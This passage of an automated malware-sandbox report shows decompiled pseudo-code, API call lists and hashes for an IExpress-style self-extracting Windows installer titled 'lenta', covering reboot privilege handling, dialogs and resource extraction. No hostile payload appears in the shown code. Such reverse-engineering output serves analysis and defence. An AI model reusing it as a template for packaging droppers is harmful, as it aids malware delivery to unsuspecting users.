                                                                        							_t13 =  *0x3d8004; // 0xf4fc83b5
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E003D44B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E003D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E003D44B9(0, 0x522, 0x3d1140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E003D1EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 003D1EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003D1F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 003D1FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: c3855d1bc11127e52c591b81268faeca4d7a9d2f954ac5bb968044db8ae23649
                                                                        • Instruction ID: 2b7a445aa064816febca424039e20d92776e28abe3abf27d6873725bec832014
                                                                        • Opcode Fuzzy Hash: c3855d1bc11127e52c591b81268faeca4d7a9d2f954ac5bb968044db8ae23649
                                                                        • Instruction Fuzzy Hash: AB21C7B3B412057BDB225BA1FC4AFBF77BCEB85B10F11011BFA06E6281D77488419661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D6CF0(char _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t1 =  &_a4; // 0x3d6e26
                                                                        				UnhandledExceptionFilter( *_t1);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003D6E26,003D1000), ref: 003D6CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(&n=,?,003D6E26,003D1000), ref: 003D6D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,003D6E26,003D1000), ref: 003D6D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,003D6E26,003D1000), ref: 003D6D12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID: &n=
                                                                        • API String ID: 3231755760-1620568440
                                                                        • Opcode ID: b8025f262b7f2a787bce11d21d03ded24fd2cc668d65143d1f2bcc54ebcdb6f4
                                                                        • Instruction ID: fb523d91a6f5f8b56ab204c1d5c8a29198eb5c9a1e7a39f16a6c77bad4f13b45
                                                                        • Opcode Fuzzy Hash: b8025f262b7f2a787bce11d21d03ded24fd2cc668d65143d1f2bcc54ebcdb6f4
                                                                        • Instruction Fuzzy Hash: F6D0C972005908FBDB022BF1FE0CA593F2CEB48313F444002F31A82020CA3244518B52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D7155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0x3d8004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0x3d8004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0x3d8008 = _t37;
                                                                        				return _t37;
                                                                        			}











                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003D7182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 003D7191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 003D719A
                                                                        • GetTickCount.KERNEL32 ref: 003D71A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003D71B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: b083798d53a0c85cdb5034eb940c1610c4252ba77080460e0a30ae9ce3496b5f
                                                                        • Instruction ID: 90d67fe23fa38ad0c10073e8b0de9cc6947ec83554c54c5ff30156d441a22b3b
                                                                        • Opcode Fuzzy Hash: b083798d53a0c85cdb5034eb940c1610c4252ba77080460e0a30ae9ce3496b5f
                                                                        • Instruction Fuzzy Hash: 76112E71D06608EFCB11DFB8EA48A9EB7F8FF48315F654957D805E7210EB309A148B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E003D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E003D43D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "lenta");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0x3d9a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3d91e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E003D44B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0x3d91e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0x3d91e5 - 3;
                                                                        						if(_t49 - 0x3d91e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0x3d91e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0x3d91e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E003D658A(0x3d91e4, 0x104, 0x3d1140);
                                                                        								_t27 = E003D58C8(0x3d91e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0x3d91e4 - 0x5c;
                                                                        									if( *0x3d91e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E003D597D(0x3d91e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0x3d91e5 - 0x5c;
                                                                        									if( *0x3d91e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E003D44B9(_t64, 0x54a, 0x3d91e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0x3d91e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0x3d91e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0x3d91e4 - 0x5c;
                                                                        						if( *0x3d91e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0x3d9124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0x3d9a3c, 0x3e8, 0x3d8598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E003D4224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3d87a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E003D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}

























                                                                        0x00000000
                                                                        0x003d33b4
                                                                        0x003d3398
                                                                        0x003d3399
                                                                        0x003d339b
                                                                        0x003d339c
                                                                        0x003d339d
                                                                        0x00000000
                                                                        0x003d339d
                                                                        0x003d334c
                                                                        0x003d3351
                                                                        0x003d3354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d335c
                                                                        0x003d3362
                                                                        0x003d3364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3366
                                                                        0x003d3367
                                                                        0x003d3369
                                                                        0x003d336a
                                                                        0x003d336b
                                                                        0x00000000
                                                                        0x003d336b
                                                                        0x003d331c
                                                                        0x003d3323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3329
                                                                        0x003d332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d332b
                                                                        0x003d324c
                                                                        0x003d324c
                                                                        0x003d324f
                                                                        0x003d32c8
                                                                        0x003d32ce
                                                                        0x00000000
                                                                        0x003d32ce
                                                                        0x003d3251
                                                                        0x003d3256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3271
                                                                        0x003d3277
                                                                        0x003d3279
                                                                        0x003d3298
                                                                        0x003d329d
                                                                        0x003d329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d32b0
                                                                        0x003d32b6
                                                                        0x003d32b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d32be
                                                                        0x003d3280
                                                                        0x003d3289
                                                                        0x003d328e
                                                                        0x00000000
                                                                        0x003d328e
                                                                        0x003d327b
                                                                        0x00000000
                                                                        0x003d327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,003D8598,00000200), ref: 003D3271
                                                                        • GetDesktopWindow.USER32 ref: 003D33E2
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D33F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 003D3410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 003D3426
                                                                        • EnableWindow.USER32(00000000), ref: 003D342D
                                                                        • EndDialog.USER32(?,00000000), ref: 003D343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                        • API String ID: 2418873061-1649533613
                                                                        • Opcode ID: 1c55354154b68ed897d7d7c45f37220a56f8133d4902425c647e66494f15f3e2
                                                                        • Instruction ID: 5aad362215e843efda4a32bc23a3a03605a01592e2281dad21a79fb0dc270209
                                                                        • Opcode Fuzzy Hash: 1c55354154b68ed897d7d7c45f37220a56f8133d4902425c647e66494f15f3e2
                                                                        • Instruction Fuzzy Hash: 605139337822517BEB235B36BD4DF7B2B6DDB46B54F50402BF245967C0CAA88E019263
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0x3d9a3c = __ecx;
                                                                        				memset(0x3d9140, 0, 0x8fc);
                                                                        				memset(0x3d8a20, 0, 0x32c);
                                                                        				memset(0x3d88c0, 0, 0x104);
                                                                        				 *0x3d93ec = 1;
                                                                        				_t20 = E003D468F("TITLE", 0x3d9154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0x3d858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0x3d9a34;
                                                                        					if(E003D468F("EXTRACTOPT", 0x3d9a34, 4) != 0) {
                                                                        						if(( *0x3d9a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0x3d9120 =  *0x3d9120 & _t65;
                                                                        							if(E003D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0x3d8a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0x3d8184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0x3d8a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E003D36EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0x3d9a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0x3d9a34 & 0x00000100) == 0 || ( *0x3d8a38 & 0x00000001) != 0 || E003D18A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E003D6517(_t57, 0x7d6, _t34, E003D19E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E003D2390(0x3d8a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E003D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E003D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0x3d8588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0x3d9a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E003D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E003D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0x3d8588);
                                                                        										 *0x3d9124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}




















                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D2CD9
                                                                        • memset.MSVCRT ref: 003D2CE9
                                                                        • memset.MSVCRT ref: 003D2CF9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 003D2DBD
                                                                        • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2E0A
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                        • API String ID: 1002816675-2993962200
                                                                        • Opcode ID: 3c62b8c1aeae58ae30711e4b7fa812c1c80945ac3d36f9165c0dc195fa4690e0
                                                                        • Instruction ID: a4c9ff45844b7f98333204d96886707cb920ab09b1c707ca483a3af6fd182b4c
                                                                        • Opcode Fuzzy Hash: 3c62b8c1aeae58ae30711e4b7fa812c1c80945ac3d36f9165c0dc195fa4690e0
                                                                        • Instruction Fuzzy Hash: 1C51D173641301ABE723AB75BD4AB7B27ADEB65700F05442BF942DA3D1DAB48C41C621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E003D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0x3d91d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0x3d8584 = _t35;
                                                                        					E003D43D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0x3d8184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "lenta");
                                                                        					_t17 = CreateThread(0, 0, E003D4FE0, 0, 0, 0x3d8798);
                                                                        					 *0x3d879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E003D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0x3d858c);
                                                                        					_t38 =  *0x3d8584; // 0x0
                                                                        					_t25 = E003D44B9(_t38, 0x4b2, 0x3d1140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0x3d91d8 = 1;
                                                                        						SetEvent( *0x3d858c);
                                                                        						_t39 =  *0x3d879c; // 0x0
                                                                        						E003D3680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0x3d858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0x3d879c, 0);
